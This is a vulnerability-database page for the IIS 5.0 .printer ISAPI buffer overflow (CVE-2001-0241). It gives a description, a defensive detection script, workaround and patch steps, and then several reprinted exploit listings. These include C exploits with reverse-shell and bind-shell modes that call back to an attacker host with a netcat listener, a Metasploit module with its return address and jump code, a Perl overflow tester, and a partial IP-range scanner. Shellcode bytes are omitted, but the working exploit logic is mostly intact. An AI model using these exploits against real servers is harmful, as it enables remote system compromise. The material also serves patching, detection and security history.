CVE-2001-0241
CVSS 10.0
Published: 2001-06-27 00:00:00
Last revised: 2016-10-17 22:10:17

[Original] Buffer overflow in Internet Printing ISAPI extension in Windows 2000 allows remote attackers to gain root privileges via a long print request that is passed to the extension through IIS 5.0.


[CNNVD] Microsoft Windows 2000 IIS 5.0 .printer ISAPI Extension Remote Buffer Overflow Vulnerability (MS01-023) (CNNVD-200106-123)

        
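The Internet Printing ISAPI extension in Microsoft Windows 2000 IIS 5.0 maps the .printer extension to msw3prt.dll, and this mapping is present by default. The interface allows printers to be used remotely over the web.
msw3prt.dll, which handles the .printer mapping, contains a buffer overflow vulnerability. A remote attacker can exploit it to execute arbitrary instructions on the host with Local System privileges.
When a remote user submits a URL request for .printer, IIS 5.0 calls msw3prt.dll to interpret the request. Because msw3prt.dll lacks buffer boundary checks, a remote user can submit a specially crafted .printer URL request whose "Host:" field contains about 420 bytes of data. This triggers a classic buffer overflow in msw3prt.dll and potentially allows arbitrary instructions to be executed. After the overflow the web service stops responding; Windows 2000 detects that the web service has stopped responding and restarts it automatically, so the system administrator is unlikely to realize that an attack has taken place.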
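A detection-side check for the request shape described above, added here as an example and not part of the original advisory: it flags `.printer` requests whose Host header, or whose authority in an absolute-URI request target, is longer than a host name can legitimately be or carries non-printable bytes. The 255-byte limit, the function names and the sample requests are assumptions constructed for illustration.

```python
"""Flag HTTP requests shaped like the .printer Host overflow (CVE-2001-0241)."""

# Assumption: a legitimate host name fits in 255 bytes (the DNS name limit);
# the advisory puts the overflow at about 420 bytes of Host data.
MAX_HOST_LEN = 255


def parse_request(raw: bytes):
    """Return (target, headers) from the head of a raw HTTP request.

    Accepts CRLF and bare-LF line endings, because a client may send either.
    """
    text = raw.replace(b"\r\n", b"\n")
    head = text.split(b"\n\n", 1)[0]
    lines = head.split(b"\n")
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            # Keep the first occurrence of a repeated header.
            headers.setdefault(name.strip().lower(), value.strip())
    return parts[1], headers


def split_target(target: bytes):
    """Split a request target into (authority, path).

    authority is b"" for the usual origin-form target ("/NULL.printer").
    """
    authority, rest = b"", target
    lowered = target.lower()
    for scheme in (b"http://", b"https://"):
        if lowered.startswith(scheme):
            authority, slash, tail = target[len(scheme):].partition(b"/")
            rest = slash + tail
            break
    return authority, rest.split(b"?", 1)[0]


def check_request(raw: bytes):
    """Return a list of findings; an empty list means nothing was flagged."""
    target, headers = parse_request(raw)
    authority, path = split_target(target)
    if not path.lower().endswith(b".printer"):
        return []  # only the .printer mapping reaches msw3prt.dll
    findings = []
    candidates = (
        ("Host header", headers.get(b"host", b"")),
        ("request-target authority", authority),
    )
    for label, value in candidates:
        if len(value) > MAX_HOST_LEN:
            findings.append(f"{label} is {len(value)} bytes (limit {MAX_HOST_LEN})")
        if any(b < 0x21 or b > 0x7E for b in value):
            findings.append(f"{label} contains non-printable bytes")
    return findings


# Constructed sample requests (filler bytes only, not captured traffic).
SAMPLES = {
    "benign": b"GET /printers/Office/.printer HTTP/1.1\r\nHost: print.example.test\r\n\r\n",
    "long-host": b"GET /NULL.printer HTTP/1.0\r\nHost: " + b"A" * 420 + b"\r\n\r\n",
    "absolute-uri": b"GET http://" + b"B" * 280 + b"/NULL.printer?q=1 HTTP/1.0\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, check_request(raw) or "ok")
```

The same length test can be expressed as an IDS or reverse-proxy rule in front of hosts that still carry the `.printer` mapping.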
        

- CVSS (Base Score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000:::datacenter_server

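- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:1068 Windows 2000 Internet Printing ISAPI Extension Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; further technical details on detection can be found in the relevant OVAL definition.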

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0241
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0241
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-123
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=98874912915948&w=2
(UNKNOWN)  BUGTRAQ  20010501 Windows 2000 IIS 5.0 Remote buffer overflow vulnerability (Remote SYSTEM Level Access)
http://www.cert.org/advisories/CA-2001-10.html
(UNKNOWN)  CERT  CA-2001-10
http://www.microsoft.com/technet/security/bulletin/ms01-023.asp
(VENDOR_ADVISORY)  MS  MS01-023
http://www.securityfocus.com/bid/2674
(VENDOR_ADVISORY)  BID  2674
http://xforce.iss.net/static/6485.php
(UNKNOWN)  XF  iis-isapi-printer-bo(6485)

- Vulnerability Information

Microsoft Windows 2000 IIS 5.0 .printer ISAPI Extension Remote Buffer Overflow Vulnerability (MS01-023)
Critical  Unknown
2001-06-27 00:00:00 2005-05-02 00:00:00
Remote
        
        

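- Advisories and Patches

Workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the risk:
* Unless the printer script is actually needed, we recommend removing the printer script mapping.
Steps:
1. Open "Internet Services Manager".
2. Right-click the selected server, choose "Properties", then choose "WWW Service" under "Master Properties".
3. Choose "Edit...", then choose "Home Directory" and click "Configuration...".
4. Remove the ".printer" entry from the "Application Mappings" list.

Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS01-023) and a corresponding patch for this issue:
MS01-023: Unchecked Buffer in ISAPI Extension Could Enable Compromise of IIS 5.0 Server
Link:
http://www.microsoft.com/technet/security/bulletin/ms01-023.asp

Patch download:

* Microsoft Windows 2000:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321

* Microsoft Windows 2000 Datacenter Server:
Patches for Windows 2000 Datacenter Server are hardware-specific and must be obtained from the original equipment manufacturer.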

- Vulnerability Information (266)

MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (EDBID:266)
windows remote
2001-05-07 Verified
80 Ryan Permeh
N/A
/***********************************************************************
iishack 2000 - eEye Digital Security - 2001
This affects all unpatched windows 2000 machines with the .printer
isapi filter loaded.  This is purely proof of concept.

Quick rundown of the exploit:
  
Eip overruns at position 260
i have 19 bytes of code to jump back to the beginning of the buffer.
(and a 4 byte eip jumping into a jmp esp located in mfc42.dll).  The 
jumpback was kinda weird, requiring a little forward padding to protect 
the rest of the code.
  
The buffer itself:
You only have about 250ish bytes before the overflow(taking into 
account the eip and jumpback), and like 211 after it.  this makes
things tight.  This is why i hardcoded the offsets and had 2 shellcodes,
one for each revision.  normally, this would suck, but since iis is kind
to us, it cleanly restarts itself if we blow it, giving us another chance.

This should compile clean on windows, linux and *bsd.  Other than that, you 
are on your own, but the vector is a simple tcp vector, so no biggie.

The vector:

the overflow happens in the isapi handling the .printer extension.  The actual
overflow is in the Host: header.  This buffer is a bit weird, so be careful 
what you pass into it.  It has a minimal amount of parsing happening before 
we get it, making some chars not able to be used(or forcing you to encode 
your payload).  As far as i can tell, the bad bytes i've come across are:

0x00(duh)
0x0a(this inits a return, basically flaking our buffer)
0x0d(same as above)
0x3a(colon: - this seems to be a separator of some kind, didn't have time or 
  energy to reverse it any further,  it breaks stuff, keep it out of 
  your buffer)
  
i have a feeling that there are more bad chars, but in the shellcode i've written
(both this proof of concept and actual port binding shellcode),  i've come across
problems, but haven't specifically tagged a "bad" char.


One more thing...  initially, i got this shellcode to fit on the left side of 
the buffer overflow.  something strange was causing it to fail if i had a length 
of under about 315 chars.  This seems strange to me, but it could be something i 
just screwed up writing this code.  This explains the 0x03s padding the end of the
shellcode.
  
Ryan Permeh
ryan@eeye.com

greetz: riley, for finding the hole
  marc, for being a cool boss
  dale,nicula,firas, for being pimps
  greg hoglund, for sparking some really interesting ideas on exploitable buffers
  dark spyrit, for beginning the iis hack tradition
  I would also like to thank the academy and to all of those who voted....
  Barry, Levonne, and their $240.00 worth of pudding.
  http://www.eeye.com/html/research/Advisories/tequila.jpg
*************************************************************************/

#ifdef _WIN32
#include <Winsock2.h>
#include <Windows.h>
#define snprintf _snprintf
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#include <stdio.h>

void usage();
unsigned char GetXORValue(char *szBuff, unsigned long filesize);

unsigned char sc[2][315]={
  "", ""  /* payload bytes omitted */
};

main (int argc, char *argv[])
{
  char request_message[500];
  int X,sock,sp=0;
  unsigned short serverport=htons(80);
  struct hostent *nametocheck;
  struct sockaddr_in serv_addr;
  struct in_addr attack;
#ifdef _WIN32
  WORD werd;
  WSADATA wsd;
  werd= MAKEWORD(2,0);
  WSAStartup(werd,&wsd);
#endif
  printf("iishack2000 - Remote .printer overflow in 2k sp0 and sp1\n");
  printf("Vulnerability found by Riley Hassell <riley@eeye.com>\n");
  printf("Exploit by Ryan Permeh <ryan@eeye.com>\n");
  if(argc < 4) usage();
  if(argv[1] != NULL)
  {
    nametocheck = gethostbyname (argv[1]);
    memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);
  }
  else usage();  
  if(argv[2] != NULL)
  {
    serverport=ntohs((unsigned short)atoi(argv[2]));
  }  
  if(argv[3] != NULL)
  {
    sp=atoi(argv[3]);
  }  
  printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
  memset(request_message,0x00,500);
  snprintf(request_message,500,"GET /null.printer HTTP/1.1\r\nHost: %s\r\n\r\n",sc[sp]);
  sock = socket (AF_INET, SOCK_STREAM, 0);
  memset (&serv_addr, 0, sizeof (serv_addr));
  serv_addr.sin_family=AF_INET;
  serv_addr.sin_addr.s_addr = attack.s_addr;
  serv_addr.sin_port = serverport;
  X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
  if(X==0)
  {
    send(sock,request_message,strlen(request_message)*sizeof(char),0);
    printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
    printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
  }
  else
  {
    printf("Couldn't connect\n",inet_ntoa(attack));
  }
#ifdef _WIN32
  closesocket(sock); 
#else
  close(sock);
#endif
  return 0;
}
void usage()
{
  printf("Syntax:   iishack2000 <hostname> <server port> <service pack>\n");
  printf("Example: iishack2000 127.0.0.1 80 0\n");
  printf("Example: iishack2000 127.0.0.1 80 1\n");  
  exit(1);
}


// milw0rm.com [2001-05-07]
		

- Vulnerability Information (268)

MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2) (EDBID:268)
windows remote
2001-05-08 Verified
80 dark spyrit
N/A
/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
 *
 *  by: dark spyrit <dspyrit@beavuh.org>
 *
 *  respect to eeye for finding this one - nice work.
 *  shouts to halvar, neofight and the beavuh bitchez.
 *
 *  this exploit overwrites an exception frame to control eip and get to
 *  our code.. the code then locates the pointer to our larger buffer and
 *  execs.
 *
 *  usage: jill <victim host> <victim port> <attacker host> <attacker port>
 *
 *  the shellcode spawns a reverse cmd shell.. so you need to set up a
 *  netcat listener on the host you control.
 *
 *  Ex: nc -l -p <attacker port> -vv
 *
 *  I haven't slept in years.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

int main(int argc, char *argv[]){

/* the whole request rolled into one, pretty huh? carez. */

unsigned char sploit[]=
  ""; /* request and payload bytes omitted */

  int       s;
  unsigned short int  a_port;
  unsigned long    a_host;
  struct hostent    *ht;
  struct sockaddr_in  sin;

  printf("iis5 remote .printer overflow.\n"
    "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");

  if (argc != 5){
    printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
    exit(1);
  }
  
  if ((ht = gethostbyname(argv[1])) == 0){
    herror(argv[1]);
    exit(1);
  }
  
  sin.sin_port = htons(atoi(argv[2]));
  a_port = htons(atoi(argv[4]));
  a_port^=0x9595;

  sin.sin_family = AF_INET;
  sin.sin_addr = *((struct in_addr *)ht->h_addr);
  
  if ((ht = gethostbyname(argv[3])) == 0){
    herror(argv[3]);
    exit(1);
  }
  
  a_host = *((unsigned long *)ht->h_addr);
  a_host^=0x95959595;

  sploit[441]= (a_port) & 0xff;
  sploit[442]= (a_port >> 8) & 0xff;

  sploit[446]= (a_host) & 0xff;
  sploit[447]= (a_host >> 8) & 0xff;
  sploit[448]= (a_host >> 16) & 0xff;
  sploit[449]= (a_host >> 24) & 0xff;

  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    perror("socket");
    exit(1);
  }
  
  printf("\nconnecting... \n");
  if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
    perror("connect");
    exit(1);
  }
  
  write(s, sploit, strlen(sploit));
  sleep (1);
  close (s);
  
  printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
  exit(0);
}  


// milw0rm.com [2001-05-08]
		

- Vulnerability Information (16469)

Microsoft IIS 5.0 Printer Host Header Overflow (EDBID:16469)
windows remote
2010-04-30 Verified
0 metasploit
N/A
##
# $Id: ms01_023_printer.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS 5.0 Printer Host Header Overflow',
			'Description'    => %q{
					This exploits a buffer overflow in the request processor of
				the Internet Printing Protocol ISAPI module in IIS. This
				module works against Windows 2000 service pack 0 and 1. If
				the service stops responding after a successful compromise,
				run the exploit a couple more times to completely kill the
				hung process.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2001-0241'],
					[ 'OSVDB', '3323'],
					[ 'BID', '2674'],
					[ 'MSB', 'MS01-023'],
					[ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 900,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Windows 2000 English SP0-SP1',
						{
							'Platform' => 'win',
							'Ret'      => 0x732c45f3,
						},
					],
				],
			'Platform'       => 'win',
			'DisclosureDate' => 'May 1 2001',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(80)
			], self.class)
	end


	def check
		connect
		sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect

		if !(resp and resp =~ /Error in web printer/)
			return Exploit::CheckCode::Safe
		end

		connect
		sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n")
		resp = sock.get_once
		disconnect

		if (resp and resp =~ /locked out/)
			print_status("The IUSER account is locked out, we can't check")
			return Exploit::CheckCode::Detected
		end

		if (resp and resp.index("HTTP/1.1 500") >= 0)
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		buf = make_nops(280)
		buf[268, 4] = [target.ret].pack('V')

		# payload is at: [ebx + 96] + 256 + 64
		buf << "\x8b\x4b\x60"        # mov ecx, [ebx + 96]
		buf << "\x80\xc1\x40"        # add cl, 64
		buf << "\x80\xc5\x01"        # add ch, 1
		buf << "\xff\xe1"            # jmp ecx

		sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

		handler
		disconnect
	end

end
		

- Vulnerability Information (20815)

Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (1) (EDBID:20815)
windows remote
2001-05-01 Verified
0 storm
N/A
source: http://www.securityfocus.com/bid/2674/info

Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.

* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. 

#!/usr/bin/perl
# Exploit By storm@stormdev.net
# Tested with success against Win2k IIS 5.0 + SP1
# Remote Buffer Overflow Test for Internet Printing Protocol 
# This code was written after eEye brought this issue in BugTraq.


use Socket;


print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";

if (not $ARGV[0]) {
	print qq~
 		Usage: webexplt.pl <host>
	~; 
exit;}


$ip=$ARGV[0];

print "Sending Exploit Code to host: " . $ip . "\n\n";
my @results=sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
print "Results:\n";

if (not @results) {
	print "The Machine tested has the IPP Vulnerability!";
}
print @results;

sub sendexplt {
        my ($pstr)=@_; 
	$target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              
		$|=1;
                print $pstr;            
		my @in=<S>;
   	        select(STDOUT);
	        close(S);
                return @in;
        } else { die("Can't connect...\n"); }
}
		

- Vulnerability Information (20816)

Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2) (EDBID:20816)
windows remote
2001-05-01 Verified
0 dark spyrit
N/A
source: http://www.securityfocus.com/bid/2674/info
 
//---------------------------sol2k.c--------------------------------
#ifdef _WIN32
#include <Winsock2.h>
#include <Windows.h>
#include <stdlib.h>
#include <string.h>
#define snprintf _snprintf
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#include <stdio.h>
#include <string.h>
#include <fcntl.h>

unsigned long *ret[20];
unsigned char send_buf[2000];
unsigned char request[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a";
unsigned char revers_shell[]=
""; /* payload bytes omitted */
//FlashSky/Benjurry and, H D Moore's code
unsigned char shell[]=
""; /* payload bytes omitted */
unsigned char overflow[]=
""; /* Host header bytes omitted */
unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
        int z=0;
        int                     s;
        unsigned short int      a_port;
        unsigned long           a_host;
        struct hostent          *ht;
        struct sockaddr_in      sin;
        #ifdef _WIN32
        WORD werd;
        WSADATA wsd;

        #endif
int main(int argc, char *argv[]){
//call ebx values in msw3prt.dll
ret[0] = 0x6A8C3105;
ret[1] = 0x6A8C317F;
ret[2] = 0x6A8C3267;
ret[3] = 0x6A8C32AD;
ret[4] = 0x6A8C3DB9;
ret[5] = 0x6A8C3DC2;
ret[6] = 0x6A8C3E23;
ret[7] = 0x6A8C4D88;
ret[8] = 0x6A8C4DD1;
ret[9] = 0x6A8C4DFB;
ret[10] = 0x6A8C5383;
ret[11] = 0x6A8C5395;
ret[12] = 0x6A8C565D;
ret[13] = 0x6A8C6437;
ret[14] = 0x6A8C6451;
ret[15] = 0x6A8C66C2;
ret[16] = 0x6A8C66FB;
ret[17] = 0x6A8C6B04;
ret[18] = 0x6A8C6B1D;
ret[19] = 0x6A8C73A4;
ret[20] = 0x6A8C73D8;
ret[21] = 0x6A8C73F4;
ret[22] = 0x6A8C9C55;
ret[23] = 0x6A8C9C86;
ret[24] = 0x6A8CCF13;
ret[25] = 0x6A8CCF4B;
ret[26] = 0x6A8CCF62;
        #ifdef _WIN32
        werd= MAKEWORD(2,0);
        WSAStartup(werd,&wsd);
        #endif
        printf("iis5 remote .printer overflow.\n"
                "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n"
                "Updated by sectroyer the member of Random Intruders\n");

if (argc < 3){
        printf("usage: %s 0 <vicHost> <vicPort> <atckHost> <atckPort> [<ret 1-26>]\nOr: %s 1 <vicHost> [<shellPort>] [<vicPort>] [<ret 1-26>]\n",argv[0],argv[0]);
        exit(1);
         }
if (argc >= 3){
        if(!atoi(argv[1]) && argc < 6)
        {
        printf("usage: %s 0 <vicHost> <vicPort> <atckHost> <atckPort> [<ret 1-26>]\nOr: %s 1 <vicHost> [<shellPort>] [<vicPort>] [<ret 1-26>]\n",argv[0],argv[0]);
        exit(1);
        }
        else if(atoi(argv[1])==1 && argc<3)
        {
        printf("usage: %s 0 <vicHost> <vicPort> <atckHost> <atckPort> [<ret 1-26>]\nOr: %s 1 <vicHost> [<shellPort>] [<vicPort>] [<ret 1-26>]\n",argv[0],argv[0]);
        exit(1);
        }
        }
        if(!atoi(argv[1]))
        {
        if(argc>6 && atoi(argv[6])<27 && atoi(argv[6])>-1)
          *(unsigned long *)&overflow[358]=ret[atoi(argv[6])];
        else
          *(unsigned long *)&overflow[358]=ret[0];
        memcpy(&send_buf,&request,strlen(request));
        memcpy(&send_buf[strlen(request)],&revers_shell,strlen(revers_shell));
        memcpy(&send_buf[strlen(request)+strlen(revers_shell)],&overflow,strlen(overflow));

        printf("You need to you need to set up a netcat listener on the host you control.\nEx: nc -l -p %s -vv\n",argv[5]);

        if ((ht = gethostbyname(argv[2])) == 0){
                printf("%s",argv[2]);
                exit(1);
        }
        sin.sin_port = htons(atoi(argv[3]));
        a_port = htons(atoi(argv[5]));
        a_port^=0x9595;

        sin.sin_family = AF_INET;
        sin.sin_addr = *((struct in_addr *)ht->h_addr);

        if ((ht = gethostbyname(argv[4])) == 0){
                printf("%s",argv[4]);
                exit(1);
        }

        a_host = *((unsigned long *)ht->h_addr);
        a_host^=0x95959595;

        send_buf[441]= (a_port) & 0xff;
        send_buf[442]= (a_port >> 8) & 0xff;

        send_buf[446]= (a_host) & 0xff;
        send_buf[447]= (a_host >> 8) & 0xff;
        send_buf[448]= (a_host >> 16) & 0xff;
        send_buf[449]= (a_host >> 24) & 0xff;
        }
        else if(atoi(argv[1])==1)
        {
        if(argc>3)
           printf("Use Netcat to connect to %s:%s\n", argv[2],argv[3]);
        else
           printf("Use Netcat to connect to %s:4444\n", argv[2]);
        if(argc>5 && atoi(argv[5])<27 && atoi(argv[5])>-1)
          *(unsigned long *)&overflow[358]=ret[atoi(argv[5])];
        else
          *(unsigned long *)&overflow[358]=ret[0];

        if(argc>3 && atoi(argv[3])>0)
        {
           lportl=atoi(argv[3]);
           lportl=htons(lportl);
           memcpy(&lport[1], &lportl, 2);
           *(long*)lport = *(long*)lport ^ 0x9432BF80;
           memcpy(&shell[279],&lport,4);
        }
        memcpy(&send_buf,&request,strlen(request));
        memcpy(&send_buf[strlen(request)],&shell,strlen(shell));
        memcpy(&send_buf[strlen(request)+strlen(shell)],&overflow,strlen(overflow));

        if ((ht = gethostbyname(argv[2])) == 0){
                printf("%s",argv[2]);
                exit(1);
        }
        if(argc>4 && atoi(argv[4])>0)
        {
            sin.sin_port = htons(atoi(argv[4]));
        }
        else
            sin.sin_port = htons(80);
        sin.sin_family = AF_INET;
        sin.sin_addr = *((struct in_addr *)ht->h_addr);
        }
        if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                perror("socket");
                exit(1);
        }

        printf("\nconnecting... \n");

        if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
                perror("connect");
                exit(1);
        }

        send(s, send_buf, strlen(send_buf),0);
        sleep (1);
        #ifdef _WIN32
        closesocket(s);
        #else
        close(s);
        #endif
        if(!z)
          printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
        else
          printf("sent...\n");
        exit(0);
}

		

- Vulnerability information (20817)

Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (3) (EDBID:20817)
windows remote
2005-02-02 Verified
0 styx
N/A [Download]
source: http://www.securityfocus.com/bid/2674/info
  
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
  
* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. 

/*
   Author:  styx^

   Source:  Iis Isapi Vulnerabilities Checker v 1.0

   License: GPL
            This program is free software; you can redistribute it and/or
            modify it under the terms of the GNU General Public License
            as published by the Free Software Foundation; either version 2
            of the License, or (at your option) any later version.

   Email:   Write me for any problem or suggestion at: the.styx@gmail.com

   Date:    02/02/2005

   Read me: Just compile it with:

            Compile: gcc iivc.c -o iivc
            Use: ./iivc <initial_ip> <final_ip> [facultative(log_file)]
            Example: ./iivc 127.0.0.1 127.0.0.4 scan.log


            PAY ATTENTION: This source is coded for only personal use on
            your own iis servers. Don't hack around.

            Special thanks very much:
            To overIP (he's my master :)
            To hacklab crew (www.hacklab.tk)

   Bug:     This checker scans a range of ip and checks the iis 5.0/1
            sp1/2 .printer ISAPI extension buffer overflow
            vulnerability. If we send to a server about
            420 bytes,we can do a buffer overflow.Find for more
            specifications of this vulnerability in
            www.securityfocus.com or bugtraq. Enjoy your self! :)

            (I've been ispired (but just this :) from perl storm@stormdev.net's
            checker).

*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>

#define PORTA 80


int i = 0, j = 0, k = 0, l = 0;
int a = 0, b = 0, c = 0, d = 0;
int z = 0;
FILE *f;


int result(int );
void scan(char *);
void separe(char *, char *);
void write_file(char *);
void author();


int main(int argn, char *argv[]) {

        char initip[16], finip[16];
        struct tm *t;
        char *sep = "+-------------------------------------------------------+\n\n\n";
        time_t s, iniz, fini;

        memset(initip, 0x0, 16);
        memset(finip, 0x0, 16);


        if ( argn < 4 ) {

                author();
                printf("\n\nUse: %s <initial_ip> <final_ip> <log_file>\n", argv[0]);
                printf("\nExample.\n%s 127.0.0.1 127.0.0.4 scan.log\n\n\n", argv[0]);
                exit(0);
        }

        time(&iniz);

        if((f = fopen(argv[3], "a")) == NULL) {
                printf("Error occured when I try to open file %s\n", argv[3]);
        }

        z++;
        printf("\nNow the checker will write the result of scan in %s in your local directory..\n\n", argv[3]);
        write_file("+-------------------------------------------------------+\n| ");
        s = time(NULL);
        write_file(asctime(localtime(&s)));
        write_file("+-------------------------------------------------------+\n|\n");
        sleep(1);


        author();
        sleep(2);
        separe(argv[1],argv[2]);

        sprintf(finip,"%d.%d.%d.%d",a,b,c,d);

        while(1) {

                sprintf(initip, "%d.%d.%d.%d", i, j, k, l);
                printf("\n\n\nI'm connecting to: %s\n", initip);

                scan(initip);

                if ( strcmp(initip, finip) == 0) {
                write_file("|");
                break;
                }

                l++;

                if ( l == 256) {
                        l = 0;
                        k++;
                        if ( k == 256) {
                                k = 0;
                                j++;
                                        if (j == 256) {
                                                j = 0;
                                                i++;
                                        }
                        }
                }


        }

        time(&fini);

        printf("\n*************************\n");

        printf("\nSCAN FINISHED! in %d sec\n\n", fini - iniz);

        if( z > 0 ) {

                printf("You can view the file %s to see quietly scan's results..\n\n", argv[3]);
                fprintf(f, "\n%s\n", sep);

        }

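        /* Close the log before returning; the original call sat after the return and never ran. */
        if (f != NULL)
                fclose(f);
        return 0;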

}


void separe(char *ip,char *ip2) {

        char *t = '\0';
        int f = 0;

        t = strtok(ip,".");
        i = atoi(t);

        while( t != NULL) {

                t = strtok(NULL, ".");
                f++;
                if ( f == 1) j = atoi(t);
                else if (f == 2) k = atoi(t);
                else if (f == 3) l = atoi(t);

        }

        t = '\0';
        f = 0;

        t = strtok(ip2,".");
        a = atoi(t);

        while( t != NULL) {

                t = strtok(NULL, ".");
                f++;
                if ( f == 1) b = atoi(t);
                else if (f == 2) c = atoi(t);
                else if (f == 3) d = atoi(t);

                }

        return;

}


void scan(char *ip) {

